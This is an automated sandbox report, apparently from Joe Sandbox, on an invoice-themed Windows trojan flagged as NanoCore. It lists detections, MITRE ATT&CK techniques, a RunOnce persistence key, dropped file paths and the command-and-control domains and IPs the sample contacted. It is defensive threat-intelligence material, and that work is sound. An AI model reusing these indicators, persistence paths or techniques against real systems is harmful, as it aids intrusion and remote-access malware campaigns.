Source: Yara match	File source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.416ff7c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.416ff7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Exploitation for Privilege Escalation1	Disable or Modify Tools11	Input Capture1	File and Directory Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Windows Service1	Application Shimming1	Deobfuscate/Decode Files or Information1	LSASS Memory	System Information Discovery13	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Service Execution2	Registry Run Keys / Startup Folder1	Access Token Manipulation1	Obfuscated Files or Information2	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Windows Service1	Software Packing1	NTDS	Security Software Discovery221	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection312	Timestomp1	LSA Secrets	Virtualization/Sandbox Evasion15	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Registry Run Keys / Startup Folder1	Masquerading11	Cached Domain Credentials	Process Discovery3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol12	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion15	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection312	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CN-Invoice-XXXXX9808-19011143287989.exe	27%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
CN-Invoice-XXXXX9808-19011143287989.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	100%	Joe Sandbox ML
C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	27%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
25.2.CasPol.exe.5840000.9.unpack	100%	Avira	TR/NanoCore.fadte		Download File
25.2.CasPol.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108376		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://coroloboxorozor.com/base/EFDD2E5486C74022C50C219C9576AB0D.html	0%	Avira URL Cloud	safe
https://go.mic	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://coroloboxorozor.com/base/320AB9634C12E7907B8FA24F3948BF4F.html	0%	Avira URL Cloud	safe
185.157.160.233	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://coroloboxorozor.com/base/A665A0731C4748264DB5C2625CAB61D4.html	0%	Avira URL Cloud	safe
http://coroloboxorozor.com	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crl.micros	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
coroloboxorozor.com	172.67.172.17	true	true		unknown
annapro.linkpc.net	105.112.108.188	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://coroloboxorozor.com/base/EFDD2E5486C74022C50C219C9576AB0D.html	true	Avira URL Cloud: safe	unknown
http://coroloboxorozor.com/base/320AB9634C12E7907B8FA24F3948BF4F.html	true	Avira URL Cloud: safe	unknown
185.157.160.233	true	Avira URL Cloud: safe	unknown
http://coroloboxorozor.com/base/A665A0731C4748264DB5C2625CAB61D4.html	true	Avira URL Cloud: safe	unknown
annapro.linkpc.net	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://go.mic	powershell.exe, 00000005.00000003.689873810.000000000734E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000005.00000003.773747719.0000000007386000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000C.00000002.947749915.00000000049AE000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000005.00000003.773747719.0000000007386000.00000004.00000001.sdmp	false		high
https://go.micro	powershell.exe, 00000005.00000003.782717627.0000000004C23000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000C.00000002.947749915.00000000049AE000.00000004.00000001.sdmp	false		high
https://sectigo.com/CPS0C	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sectigo.com/CPS0D	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://coroloboxorozor.com	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.903984794.0000000003251000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.941033041.0000000002EA1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.940976740.00000000036E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net/	AdvancedRun.exe, AdvancedRun.exe, 00000008.00000000.689085793.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.903984794.0000000003251000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.946142448.0000000004871000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.941033041.0000000002EA1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.940976740.00000000036E1000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000005.00000003.773747719.0000000007386000.00000004.00000001.sdmp	false		high
http://crl.micros	powershell.exe, 00000005.00000003.808326949.0000000008D9E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.157.160.233	unknown	Sweden	197595	OBE-EUROPEObenetworkEuropeSE	true
104.21.71.230	unknown	United States	13335	CLOUDFLARENETUS	true
172.67.172.17	unknown	United States	13335	CLOUDFLARENETUS	true
105.112.108.188	unknown	Nigeria	36873	VNL1-ASNG	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356721
Start date:	23.02.2021
Start time:	15:29:40
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 17m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	CN-Invoice-XXXXX9808-19011143287989.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@44/19@6/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 18.5% (good quality ratio 17.6%) Quality average: 82.7% Quality standard deviation: 26.3%
HCA Information:	Successful, ratio: 74% Number of executed functions: 77 Number of non-executed functions: 176
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 51.104.144.132, 168.61.161.212, 104.43.193.48, 104.43.139.144, 23.211.6.115, 51.104.139.180, 52.255.188.83, 8.248.115.254, 67.26.75.254, 8.248.137.254, 8.248.147.254, 8.248.135.254, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 104.42.151.234 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/356721/sample/CN-Invoice-XXXXX9808-19011143287989.exe

Simulations

Behavior and APIs

Time	Type	Description
15:30:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce NtxOsDXQL explorer.exe "C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe"
15:30:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce NtxOsDXQL explorer.exe "C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe"
15:31:18	API Interceptor	53x Sleep call for process: powershell.exe modified
15:31:32	API Interceptor	10x Sleep call for process: svchost.exe modified
15:32:11	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.157.160.233	18.02.2021 PAYMENT INFO.exe	Get hash	malicious	Browse
	CN-Invoice-XXXXX9808-19011143287989.exe	Get hash	malicious	Browse
	CN-Invoice-XXXXX9808-19011143287989 (2).exe	Get hash	malicious	Browse
	Doc#6620200947535257653.exe	Get hash	malicious	Browse
	DHL_10177_R29_DOCUMENT.exe	Get hash	malicious	Browse
	Doc#6620200947535257653.exe	Get hash	malicious	Browse
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse
	FedExs AWB#5305323204643.exe	Get hash	malicious	Browse
	URGENT QUOTATION 473833057.exe	Get hash	malicious	Browse
	P-O Doc #6620200947535257653.exe	Get hash	malicious	Browse
104.21.71.230	SecuriteInfo.com.Variant.Bulz.368783.31325.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/753007B764720AC1F46C7741AC807FF3.html
	PRICE LIST (NOVEMBER 2020).exe	Get hash	malicious	Browse	coroloboxorozor.com/base/FBD1AA88F2DB3E5E79F7212492E97FE4.html
	A4-058000200390-10-14_REV_pdf.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/B7EFDEC15CD29E4CF1B708AC6486760D.html
	Purchase_order_397484658464974945648447564845.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/C02C82A7124B198823DC14A0727ADA5A.html
	0603321WG_0_1 pdf.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/008D1C43D45C0A742A0D32B591796DBD.html
	VIws8bzjD5.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html
	quotation_PR # 00459182..exe	Get hash	malicious	Browse	coroloboxorozor.com/base/4FD4067B934700360B786D96F374CFDE.html
	PURCHASE ORDER CONFIRMATION.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/13F70A6846505248D031FD970E34143C.html
	PAYRECEIPT.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/FB9E1E734185F7528241A9972CE86875.html
	New Order.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/787C0D9D971EA648C79BB43D6A91B32D.html
	TT.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/67C230E277706E38533C2138734032C2.html
	Payment_pdf.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/07E3F6F835A7792863F708E23906CE42.html
	TT.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/40B9FF72D3F4D8DF64BA5DD4E106BE04.html
	purchase order 1.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/AEF764C22A189B57AC28E3EBBC72AEBF.html
	telex transfer.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/EB6932098F110FB9EB9C8B27A1730610.html
	ORDER PURCHASE ITEMS.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/20872932CF927ACBA3BF36E6C823C99C.html
	Doc_3975465846584657465846486435454,pdf.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/92C7F4831C860C5A2BD3269A6771BC0C.html
	CV-JOB REQUEST______pdf.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/38A59769F794F78901E2621810DAAA3A.html
	CN-Invoice-XXXXX9808-19011143287989.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html
	Download_quotation_PR #371073.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/ABC115F63E3898678C2BE51E3DFF397C.html

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
annapro.linkpc.net	CN-Invoice-XXXXX9808-19011143287989.exe	Get hash	malicious	Browse	105.112.106.235
	CN-Invoice-XXXXX9808-19011143287989 (2).exe	Get hash	malicious	Browse	105.112.109.252
	Doc#6620200947535257653.exe	Get hash	malicious	Browse	105.112.102.162
	Doc#6620200947535257653.exe	Get hash	malicious	Browse	105.112.106.128
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	105.112.113.90
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	105.112.113.90
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	105.112.113.90
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	105.112.113.90
	FedExs AWB#5305323204643.exe	Get hash	malicious	Browse	105.112.113.90
	DHL_document11022020680908911.exe	Get hash	malicious	Browse	129.205.113.251
	DHL ShipmentDHL Shipment 237590.pdf.exe	Get hash	malicious	Browse	129.205.124.172
	Doc_AWB#5305323204643_UPS.pdf.exe	Get hash	malicious	Browse	129.205.124.152
coroloboxorozor.com	SecuriteInfo.com.Variant.Bulz.368783.31325.exe	Get hash	malicious	Browse	104.21.71.230
	PRICE LIST (NOVEMBER 2020).exe	Get hash	malicious	Browse	104.21.71.230
	A4-058000200390-10-14_REV_pdf.exe	Get hash	malicious	Browse	104.21.71.230
	Purchase_order_397484658464974945648447564845.exe	Get hash	malicious	Browse	104.21.71.230
	0603321WG_0_1 pdf.exe	Get hash	malicious	Browse	172.67.172.17
	Payment_pdf.exe	Get hash	malicious	Browse	172.67.172.17
	RG6ws8jWUJ.exe	Get hash	malicious	Browse	172.67.172.17
	VIws8bzjD5.exe	Get hash	malicious	Browse	104.21.71.230
	PURCHASE ITEMS.exe	Get hash	malicious	Browse	172.67.172.17
	CN-Invoice-XXXXX9808-19011143287992.exe	Get hash	malicious	Browse	172.67.172.17
	quotation_PR # 00459182..exe	Get hash	malicious	Browse	104.21.71.230
	PURCHASE ORDER CONFIRMATION.exe	Get hash	malicious	Browse	104.21.71.230
	PAYMENTADVICENOTE103_SWIFTCOPY0909208.exe	Get hash	malicious	Browse	172.67.172.17
	XP 6.xlsx	Get hash	malicious	Browse	172.67.172.17
	PAYRECEIPT.exe	Get hash	malicious	Browse	104.21.71.230
	New Order.exe	Get hash	malicious	Browse	104.21.71.230
	PO#87498746510.exe	Get hash	malicious	Browse	172.67.172.17
	TT.exe	Get hash	malicious	Browse	172.67.172.17
	Payment_pdf.exe	Get hash	malicious	Browse	172.67.172.17
	TT.exe	Get hash	malicious	Browse	104.21.71.230

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	Purchase Order list.exe	Get hash	malicious	Browse	104.21.23.61
	RkoKlvuLh6.exe	Get hash	malicious	Browse	162.159.136.232
	i0fOtOV8v0.exe	Get hash	malicious	Browse	104.23.99.190
	P3knxzE7wN.exe	Get hash	malicious	Browse	162.159.128.233
	zLyXzE7WZi.exe	Get hash	malicious	Browse	162.159.138.232
	wLy18x5e2o.exe	Get hash	malicious	Browse	162.159.136.232
	QJ2UZbJWDS.exe	Get hash	malicious	Browse	162.159.136.232
	12ojLsHzee.exe	Get hash	malicious	Browse	162.159.128.233
	seed.exe	Get hash	malicious	Browse	104.21.76.242
	SWW8Mmeq6o.exe	Get hash	malicious	Browse	162.159.135.232
	iY2FJ1t6Nk.exe	Get hash	malicious	Browse	162.159.138.232
	BIb5AQZOu9.exe	Get hash	malicious	Browse	104.23.98.190
	egwbnzACBa.exe	Get hash	malicious	Browse	162.159.137.232
	N8MwnxcRDv.exe	Get hash	malicious	Browse	162.159.137.232
	7XJCrOkoIy.exe	Get hash	malicious	Browse	162.159.135.232
	fNOZjHL61d.exe	Get hash	malicious	Browse	104.23.98.190
	99ytGeokLb.exe	Get hash	malicious	Browse	162.159.135.232
	Ru8jlqio70.exe	Get hash	malicious	Browse	104.23.98.190
	REVISED ORDER 2322020.EXE	Get hash	malicious	Browse	162.159.135.233
	SecuriteInfo.com.Variant.Bulz.368783.31325.exe	Get hash	malicious	Browse	172.67.172.17
OBE-EUROPEObenetworkEuropeSE	REVISED ORDER 2322020.EXE	Get hash	malicious	Browse	185.86.106.202
	muOvK6dngg.exe	Get hash	malicious	Browse	45.148.16.42
	RE ICA 40 Sdn Bhd- Purchase Order#6769704.exe	Get hash	malicious	Browse	185.86.106.202
	Offer Request 6100003768.exe	Get hash	malicious	Browse	185.86.106.202
	CN-Invoice-XXXXX9808-19011143287990.exe	Get hash	malicious	Browse	185.157.161.86
	JFAaEh5hB6.exe	Get hash	malicious	Browse	45.148.16.42
	BMfiIGROO2.exe	Get hash	malicious	Browse	45.148.16.42
	SLAX3807432211884DL772508146394DO.exe	Get hash	malicious	Browse	194.32.146.140
	CN-Invoice-XXXXX9808-19011143287990.exe	Get hash	malicious	Browse	185.157.161.86
	18.02.2021 PAYMENT INFO.exe	Get hash	malicious	Browse	185.157.160.233
	DHL_Shipment_Notofication#554334.exe	Get hash	malicious	Browse	217.64.149.164
	07oof4WcEB.exe	Get hash	malicious	Browse	45.148.16.42
	Codes.exe	Get hash	malicious	Browse	185.157.161.104
	CN-Invoice-XXXXX9808-19011143287989.exe	Get hash	malicious	Browse	185.157.160.233
	3yevr0iqCW.exe	Get hash	malicious	Browse	45.148.16.42
	CN-Invoice-XXXXX9808-19011143287989 (2).exe	Get hash	malicious	Browse	185.157.160.233
	Statement.exe	Get hash	malicious	Browse	185.157.162.107
	Order_List_PO# 081929.exe	Get hash	malicious	Browse	185.157.161.86
	order-1812896543124646450.exe	Get hash	malicious	Browse	185.157.161.86
	Doc#6620200947535257653.exe	Get hash	malicious	Browse	185.157.160.233

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	PURCHASE ITEMS.exe	Get hash	malicious	Browse
	CN-Invoice-XXXXX9808-19011143287992.exe	Get hash	malicious	Browse
	quotation_PR # 00459182..exe	Get hash	malicious	Browse
	PURCHASE ORDER CONFIRMATION.exe	Get hash	malicious	Browse
	New Order.exe	Get hash	malicious	Browse
	PO#87498746510.exe	Get hash	malicious	Browse
	TT.exe	Get hash	malicious	Browse
	TT.exe	Get hash	malicious	Browse
	CN-Invoice-XXXXX9808-19011143287989.exe	Get hash	malicious	Browse
	Download_quotation_PR #371073.exe	Get hash	malicious	Browse
	CN-Invoice-XXXXX9808-19011143287990.exe	Get hash	malicious	Browse
	PurchaseOrdersCSTtyres004786587.exe	Get hash	malicious	Browse
	3zKVfxhs18.exe	Get hash	malicious	Browse
	AWB783079370872.docm	Get hash	malicious	Browse
	DETALLE DE TRANSFERENCIA BANCO AGRARO DE COLOMBIA.exe	Get hash	malicious	Browse
	CN-Invoice-XXXXX9808-19011143287990.exe	Get hash	malicious	Browse
	Payment Advice 170221.exe	Get hash	malicious	Browse
	Payment Receipt.jar	Get hash	malicious	Browse
	miner.exe	Get hash	malicious	Browse
	875666665.xlsm.xlsm	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_3LWGGRA4ECLWYAEO_2aa94db33785b58d447d3d90f424844979f69fb2_d8c2f26c_1bc6c0ab\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	16870
Entropy (8bit):	3.7816778401859055
Encrypted:	false
SSDEEP:	192:OdmLQXAmHBUZMXyHpaKsUAeZiQm/u7skS274ItxAJA/:ymLQXxBUZMXyHpalmK/u7skX4ItxAJ+
MD5:	27204D728FF664D47266701BE10C22CD
SHA1:	5F4140B059B5C27B3A4BA44875E9CA270E38B69B
SHA-256:	AE3078760B3575BDC39F8932FB5E5349B60C4947E7D8150FDF5A5257CD22A682
SHA-512:	E3EE4D794995F2FFD144B4E8C5EE19BD89BC5EEFEC9DD4853E126EAB3A70860D9E1076BE187B907D441EE21150A9DB4887B3960C551EE2351416D0C8831F66F0
Malicious:	false
